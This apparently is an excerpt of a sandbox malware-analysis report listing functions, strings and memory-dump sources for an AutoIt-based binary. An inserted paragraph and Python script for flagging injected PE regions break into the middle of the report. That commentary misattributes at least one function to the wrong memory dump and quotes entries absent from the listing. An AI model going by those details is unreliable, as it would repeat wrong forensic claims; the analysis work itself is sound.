                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C5874082
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C5874090
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740A0
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740B0
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740BE
                      • Part of subcall function 00007FF6C5874050: MapVirtualKeyW.USER32(?,?,?,00007FF6C5874DDE), ref: 00007FF6C58740CC
                      • Part of subcall function 00007FF6C58740DC: RegisterWindowMessageW.USER32(?,?,?,00007FF6C5874F68), ref: 00007FF6C5874146
                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C587106D), ref: 00007FF6C5875042
                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C587106D), ref: 00007FF6C58750C8
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C587106D), ref: 00007FF6C58BB336
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: AutoIt
                    • API String ID: 1986988660-2515660138
                    • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                    • Instruction ID: a756a878d158124cb0f50f3e0a778127c01a276b5c638c842337294f048de62c
                    • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                    • Instruction Fuzzy Hash: A5C1C2B1D19B8285E680DF15EDD407877A8FF94B82F5402BAD4CDC2662DFBCA958C780
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: $*
                    • API String ID: 3215553584-3982473090
                    • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                    • Instruction ID: 3dc3b6271e4eb8d5e85852a614ac2ac7a4cb2c0375181ab098be17d7bef7a205
                    • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                    • Instruction Fuzzy Hash: B361987292E2628AE7689F74885537C77A1EB45F4BF141235CADAC61D9CF2CDC81C701
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID: !$acos
                    • API String ID: 1156100317-2870037509
                    • Opcode ID: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                    • Instruction ID: 3ad86b0e2e1b9b98166b88090549ed6c78c34231935437361af2e6c86807c3ec
                    • Opcode Fuzzy Hash: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                    • Instruction Fuzzy Hash: 7761FB21D2CF9588E623CF355C103769754AFB6BD2F118336E99EF5AA5DF2CE4828600
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID: !$asin
                    • API String ID: 1156100317-2188059690
                    • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                    • Instruction ID: 59e0ea7c531c61ad2f2f6cbeab5a0a9575628679cc8383f4f5ce8d5c67f99d46
                    • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                    • Instruction Fuzzy Hash: 6D61B922D2CFD585E253CF755C113769358AFA67D2F108332E99EF5AA9DF2CE4828600
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 2775327233-1405518554
                    • Opcode ID: 1336b63d4d684dbac4033a15bfb0a4e14f679ec9357e9498134274dee5581141
                    • Instruction ID: bcfe1bc6e7316c77cbd42343ce7f05bacce7a64cf0677bc09fc2611af0ec560d
                    • Opcode Fuzzy Hash: 1336b63d4d684dbac4033a15bfb0a4e14f679ec9357e9498134274dee5581141
                    • Instruction Fuzzy Hash: B3414A36B02B40E9FB14DF70D4F83EC33A4EBA4748F040525AE4967A59EB34C9A6D314
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem
                    • String ID: P
                    • API String ID: 135850232-3110715001
                    • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                    • Instruction ID: ba67e8ecadd7a9ec394189e0bb00e98c46dab0c0da8047e0024cbcfefb8440f0
                    • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                    • Instruction Fuzzy Hash: 1C41B036B056A281E720DF15C8093AD67A4EB86FA1F5A8231EAED877C1DF7CD845C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ByteCharErrorFileLastMultiWideWrite
                    • String ID: U
                    • API String ID: 2456169464-4171548499
                    • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                    • Instruction ID: b365f21ad7f1a05f29f016c8c25a3f873c03ee0e7bdde1a6255f4e8807bc97d0
                    • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                    • Instruction Fuzzy Hash: AF41B122B1979182DB608F25EC443AA77A0FB98B95F844431EE8DC7788DF7CD845C750
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                    • Instruction ID: a6db6c7743900a15e9c1acf89d144358113554d93846cea5a449a69dfca87bff
                    • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                    • Instruction Fuzzy Hash: 6E416D32A097D286E7708F24E844B9A77A1F784BA5F144375DAAC47BA9CF3CD845CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: NameName::
                    • String ID: %lf
                    • API String ID: 1333004437-2891890143
                    • Opcode ID: d5f16a7c5467462be1cf5b964019ae1b2bde45019dae381a265a9ba1ad95e400
                    • Instruction ID: 54eceebae92442c13e86fe516eeb118ccd7f70138e918802bfc0fbc20f0bc2fd
                    • Opcode Fuzzy Hash: d5f16a7c5467462be1cf5b964019ae1b2bde45019dae381a265a9ba1ad95e400
                    • Instruction Fuzzy Hash: 1131E871604B84B5FA11EB25B8782EA77A4FB75BC4F148112EE8A93765DF38C1C78B40
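The entries above trace to two different memory dumps of process 21: most come from the loaded image at 00007FF6C5870000 (protection 00000020, type 01000000), while the `_invalid_parameter_noinfo`, `std::_Lockit` and `NameName::` functions come from a second dump at 0000021925C50000 whose name carries protection 00000040 and type 00020000, yet is still "based on PE: true". The script below is an added triage helper, not part of the Joe Sandbox report or its tooling: it parses these "Memory Dump Source", "API ID" and "String ID" records, decodes the protection and type fields as the Windows `MEMORY_BASIC_INFORMATION` constants (PAGE_EXECUTE_READ / PAGE_EXECUTE_READWRITE, MEM_IMAGE / MEM_PRIVATE), and flags any region where a PE was parsed outside loader-mapped memory or in writable and executable pages. The `.sdmp` field layout is an assumption inferred from the file names on this page; the two fields it does not decode are left uninterpreted, and the sample text is a constructed excerpt of the entries above.

```python
"""Added triage helper (not part of the Joe Sandbox report): decode the
'Memory Dump Source' records of a function listing and flag regions where a
PE was parsed outside loader-mapped (MEM_IMAGE) memory or in RWX pages.

ASSUMPTION: the .sdmp name layout is inferred from the report itself:
  <procidx>.<dumpno>.<dumpid>.<regionbase>.<protect>.<unknown>.<memtype>.<unknown>.sdmp
'protect' and 'memtype' are decoded as Windows MEMORY_BASIC_INFORMATION
constants; the two 'unknown' fields are carried through undecoded."""
import re
from dataclasses import dataclass, field

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE, MEM_MAPPED, MEM_PRIVATE = 0x1000000, 0x40000, 0x20000
MEM_TYPE = {MEM_IMAGE: "MEM_IMAGE", MEM_MAPPED: "MEM_MAPPED", MEM_PRIVATE: "MEM_PRIVATE"}
PAGE_EXECUTE_ANY = 0xF0  # any PAGE_EXECUTE* bit
PAGE_WRITE_ANY = 0xCC    # READWRITE | WRITECOPY | EXECUTE_READWRITE | EXECUTE_WRITECOPY

HEX = "[0-9A-Fa-f]"
SOURCE_RE = re.compile(
    rf"Source File:\s*(?P<proc>{HEX}{{8}})\.(?P<dump>{HEX}{{8}})\.\d+\.(?P<region>{HEX}{{16}})"
    rf"\.(?P<protect>{HEX}{{8}})\.{HEX}{{8}}\.(?P<memtype>{HEX}{{8}})\.{HEX}{{8}}\.sdmp,"
    rf"\s*Offset:\s*(?P<offset>{HEX}{{16}}),\s*based on PE:\s*(?P<pe>true|false)", re.I)
# Anchored so that "API String ID:" / "Instruction ID:" lines are not matched.
API_RE = re.compile(r"^[ \t]*•?[ \t]*API ID:[ \t]*(.*)$", re.M)
STRING_RE = re.compile(r"^[ \t]*•?[ \t]*String ID:[ \t]*(.*)$", re.M)
ENTRY_SPLIT = re.compile(r"^[ \t]*APIs[ \t]*$", re.M)  # each function entry starts with "APIs"


@dataclass
class Region:
    process_index: int   # 00000015 -> 21, matching the hcaresult_21_2_* snapshot names
    dump_number: int
    module_base: int     # the 'Offset:' value, the image base the dump was rebased on
    region_base: int     # start of the dumped memory region
    protect: int
    mem_type: int
    based_on_pe: bool
    api_ids: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    def protect_name(self):
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    def mem_type_name(self):
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def findings(self):
        """Heuristics worth a second look; they are indicators, not proof of injection."""
        out = []
        if self.based_on_pe and self.mem_type != MEM_IMAGE:
            out.append(f"PE parsed at {self.module_base:#x} in {self.mem_type_name()} memory: "
                       "not mapped by the OS loader (manual map or injected payload)")
        if self.protect & PAGE_EXECUTE_ANY and self.protect & PAGE_WRITE_ANY:
            out.append(f"region {self.region_base:#x} is {self.protect_name()} (writable and executable)")
        return out


def parse_report(text):
    """Group function entries by module base and collect their API/String IDs."""
    regions = {}
    for chunk in ENTRY_SPLIT.split(text):
        src = SOURCE_RE.search(chunk)
        if not src:
            continue
        base = int(src["offset"], 16)
        region = regions.setdefault(base, Region(
            process_index=int(src["proc"], 16), dump_number=int(src["dump"], 16),
            module_base=base, region_base=int(src["region"], 16),
            protect=int(src["protect"], 16), mem_type=int(src["memtype"], 16),
            based_on_pe=src["pe"].lower() == "true"))
        api = API_RE.search(chunk)
        if api and api[1].strip():
            region.api_ids.append(api[1].strip())
        strs = STRING_RE.search(chunk)
        if strs:
            for s in strs[1].split("$"):       # '$' separates strings in the String ID field
                s = s.strip()
                if s and s not in region.strings:
                    region.strings.append(s)
    return regions


def summarize(regions):
    lines = []
    for base, r in sorted(regions.items()):
        lines.append(f"proc #{r.process_index} dump {r.dump_number}: module {base:#x} region {r.region_base:#x} "
                     f"{r.protect_name()} {r.mem_type_name()} PE={r.based_on_pe} "
                     f"apis={len(r.api_ids)} strings={len(r.strings)}")
        lines.extend("  ! " + f for f in r.findings())
    return lines


# Constructed excerpt of the function listing above (three entries, two dump sources).
SAMPLE = """\
APIs
• EnterCriticalSection.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F0774
• TerminateThread.KERNEL32(?,?,?,00007FF6C58BB91D,?,?,?,00007FF6C5881CE2), ref: 00007FF6C58F077F
Memory Dump Source
• Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
Similarity
• API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
• String ID:
• API String ID: 3142591903-0
APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
Similarity
• API ID: NameName::
• String ID: %lf
• API String ID: 1333004437-2891890143
"""

if __name__ == "__main__":
    print("\n".join(summarize(parse_report(SAMPLE))))
```

Run it against a text export of the whole function listing rather than this excerpt to get the full API and string inventory per region; the region at 0000021925C50000 is the one to carve out and inspect as its own PE, since the loader never mapped it there.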
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateObjectStock
                    • String ID: SysMonthCal32
                    • API String ID: 2671490118-1439706946
                    • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                    • Instruction ID: a109fd6a5950597a7f85c915e65ef840638c9f0c7eaacd7a74c3ec7dbf16fd65
                    • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                    • Instruction Fuzzy Hash: 46416E326086C2CAE370CF15E844B5AB7A1F788791F504235EADD43A99DF3CD8858F40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                    • String ID: msctls_updown32
                    • API String ID: 1752125012-2298589950
                    • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                    • Instruction ID: 1f7e60f94b28c99a38bec1a8fe66149caed7b45e2c9a6613217a43e159563f4c
                    • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                    • Instruction Fuzzy Hash: 87316D76A18B8196EB60CF15E8903AA7361FB95B92F108175DA8D83B99CF3CD845CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateMoveObjectStock
                    • String ID: Listbox
                    • API String ID: 3747482310-2633736733
                    • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                    • Instruction ID: c87228f974679e3cf9b8295c28416720c8d7724372f841707eed916a979c0de3
                    • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                    • Instruction Fuzzy Hash: F6313C366087C186E770CF15B844A5AB7A5F788BA1F508225EAE903B99CF3DD885CF40
                    APIs
                    • GetOpenFileNameW.COMDLG32 ref: 00007FF6C58BB0D8
                      • Part of subcall function 00007FF6C5875A50: GetFullPathNameW.KERNEL32(?,00007FF6C5875A3D,?,00007FF6C5874C50,?,?,?,00007FF6C587109E), ref: 00007FF6C5875A7B
                      • Part of subcall function 00007FF6C5874694: GetLongPathNameW.KERNEL32 ref: 00007FF6C58746B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen
                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                    • API String ID: 779396738-2360590182
                    • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                    • Instruction ID: e173aafaff7d3efcfb9d45a8ee1d81ff0d6011a46bac6cc0ea8efeae1b04902f
                    • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                    • Instruction Fuzzy Hash: F8315862709B9289E710DF22D8401AD77A8FB49FC5F984175EA8C83B6ADF3CD945CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: msctls_trackbar32
                    • API String ID: 1025951953-1010561917
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                    • String ID: csm
                    • API String ID: 2280078643-1018135373
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    APIs
                    Strings
